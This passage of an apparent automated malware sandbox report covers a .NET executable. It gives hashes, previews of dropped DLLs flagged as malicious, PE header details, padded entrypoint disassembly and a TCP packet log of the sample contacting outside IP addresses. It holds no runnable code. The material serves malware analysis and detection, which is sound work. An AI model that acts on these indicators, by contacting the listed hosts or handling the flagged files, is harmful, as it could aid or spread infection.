                                                                                    SHA-256:9309FB2A3F326D0F2CC3F2AB837CFD02E4F8CB6B923B3B2BE265591FD38F4961
                                                                                    SHA-512:170C3645083D869E2368EE16325D7EDAEBA2D8F1D3D4A6A1054CFDD8616E03073772EEAE30C8F79A93173825F83891E7B0E4FD89EF416808359F715A641747D7
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{..;...;...;...!./...#...."......D..<....D.......D..+.......3...%HC.8...;......D..:...D..:...D/.:...D..:...Rich;...........................PE..d...vr.a.........." ......................................................................`.........................................@........,..x.......................0A......(....x..p........................... y............... ...............................text............................... ..`.rdata....... ......................@..@.data....Y...@...D...(..............@....pdata...............l..............@..@.gfids..............................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\x86\SQLite.Interop.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1374512
                                                                                    Entropy (8bit):6.792638917504314
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:eiDAYMz2epP8AEXn8z7qsyb8c+gntHKuvKtBLtTvD0nsrFSK96fYlYyv:1AYMza36enEuyjpTV96A2yv
                                                                                    MD5:8BE215ABF1F36AA3D23555A671E7E3BE
                                                                                    SHA1:547D59580B7843F90AACA238012A8A0C886330E6
                                                                                    SHA-256:83F332EA9535814F18BE4EE768682ECC7720794AEDC30659EB165E46257A7CAE
                                                                                    SHA-512:38CF4AEA676DACD2E719833CA504AC8751A5FE700214FF4AC2B77C0542928A6A1AA3780ED7418387AFFED67AB6BE97F1439633249AF22D62E075C1CDFDF5449B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h.............jO......jO..^...jO............................,..................F...I.......I.......L.......I.......Rich............................PE..L..._r.a...........!.....n...F............................................................@.............................h.......x....`..................0A...p..h...p...p...............................@...............@............................text...fl.......n.................. ..`.rdata...............r..............@..@.data....5.......(..................@....gfids.......P......."..............@..@.rsrc........`.......$..............@..@.reloc..h....p......................@..B........................................................................................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):5.27473695537137
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    File name:LnSNtO8JIa.exe
                                                                                    File size:419'840 bytes
                                                                                    MD5:c4d558acc94162490f5048e29fdba96f
                                                                                    SHA1:62c3e55c500a5ec72568591ea7873288951c7b25
                                                                                    SHA256:3d7066dda89f31d017e8d9cb6131f14f3aab9ec7cdb8d997a7d8198adf197180
                                                                                    SHA512:5d52359e0f90a4ddc997ff95beead7024d761cf5d0bde2195ca237eea0a836de949ba8dfb390ffaf8e97b0bee5a7d2d3df7b268bb6bfd4b337d436ff5c3c3cb5
                                                                                    SSDEEP:12288:rHaDwqMZ+R4hPhhscC9AcUYxDSA6hieEn1dvXB9XR77ir6Nmu91eLfKPSSP3v/qr:r6Yb
                                                                                    TLSH:349414AC721076DFC85BC472DEA81DA8EB6078BB931B4203946715EDAE4D997CF140F2
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t&..........."...0..\...........|... ........@.. ....................................`................................

                                                                                    File Icon

                                                                                    Icon Hash:00928e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x467cea
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x84267492 [Wed Apr 4 00:38:42 2040 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x67c440x4a.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x58e.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x6a0000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x67c8e0x38.text
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x65cf00x65e00False0.34434192868098157data5.273778994454453IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x680000x58e0x600False0.4108072916666667data4.029304873192119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x6a0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0x680a00x304data0.42875647668393785
                                                                                    RT_MANIFEST0x683a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 4, 2024 08:29:54.641305923 CET4971180192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:54.820241928 CET8049711149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:54.820358992 CET4971180192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:54.821300030 CET4971180192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.000010014 CET8049711149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.000050068 CET8049711149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.004627943 CET49712443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.004667044 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.004740000 CET49712443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.019144058 CET49712443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.019165039 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.045118093 CET4971180192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.393330097 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.393409014 CET49712443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.399329901 CET49712443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.399342060 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.399617910 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.451337099 CET49712443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.656748056 CET49712443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.700742960 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.849267960 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.849291086 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.849298954 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.849339008 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.849355936 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.849384069 CET44349712149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.849426985 CET49712443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.849451065 CET49712443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.860682011 CET49712443192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:55.862042904 CET4971180192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:56.041536093 CET8049711149.154.167.99192.168.2.6
                                                                                    Jan 4, 2024 08:29:56.041661024 CET4971180192.168.2.6149.154.167.99
                                                                                    Jan 4, 2024 08:29:56.282944918 CET49713443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.282977104 CET44349713104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:56.283055067 CET49713443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.283946991 CET49713443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.283965111 CET44349713104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:56.489384890 CET44349713104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:56.489516020 CET49713443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.493210077 CET49713443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.493221045 CET44349713104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:56.493546963 CET44349713104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:56.495733023 CET49713443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.540745020 CET44349713104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:56.951222897 CET44349713104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:56.951325893 CET44349713104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:56.951389074 CET49713443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.952264071 CET49713443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.955013037 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.955046892 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:56.955125093 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.955719948 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:56.955734015 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.155478954 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.157465935 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:57.157481909 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.820796967 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.820830107 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.820854902 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.820871115 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:57.820884943 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.820914984 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.820921898 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:57.820930004 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.820970058 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:57.821013927 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.821583033 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.821629047 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:57.821635962 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.821688890 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.821729898 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:57.821737051 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:57.873253107 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.032727003 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.032838106 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.032869101 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.032898903 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.032912016 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.032952070 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.033183098 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.033241987 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.033284903 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.033292055 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.033644915 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.033680916 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.033705950 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.033708096 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.033729076 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.033762932 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.033768892 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.033807039 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.033813953 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.034528971 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.034575939 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.034576893 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.034585953 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.034617901 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.034625053 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.034714937 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.034765959 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.034773111 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.035482883 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.035512924 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.035530090 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.035537958 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.035576105 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.035582066 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.076370955 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.244927883 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.245026112 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.245088100 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.245105028 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.245234966 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.245279074 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.245281935 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.245294094 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.245332956 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.245498896 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.245738029 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.245771885 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.245840073 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.245847940 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.245882988 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.246483088 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.246550083 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.246714115 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.246773005 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.247292995 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.247358084 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.247364044 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.247400045 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.247461081 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.247509956 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.247560024 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.247612000 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.248421907 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.248496056 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.248605967 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.248667002 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.248672962 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.249174118 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.249239922 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.249247074 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.249285936 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.249461889 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.249520063 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.249526024 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.249567032 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.250144005 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.250201941 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.250283957 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.250333071 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.250581026 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.250637054 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.457614899 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.457681894 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.457693100 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.457712889 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.457726955 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.457750082 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.458076954 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.458137035 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.458142996 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.458184004 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.458662987 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.458703041 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.458718061 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.458724976 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.458750963 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.459585905 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.459631920 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.459640026 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.459646940 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.459677935 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.459697008 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.460066080 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.460130930 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.460509062 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.460561037 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.460566044 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.460582018 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.460612059 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.461149931 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.461201906 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.461209059 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.461246967 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.461277008 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.461327076 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.461941004 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.461996078 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.462024927 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.462074041 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.462980032 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.463035107 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.463107109 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.463160992 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.463788033 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.463843107 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.463906050 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.463963032 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.463972092 CET44349714104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:29:58.463983059 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.464020014 CET49714443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:29:58.464782000 CET44349714104.21.89.193192.168.2.6
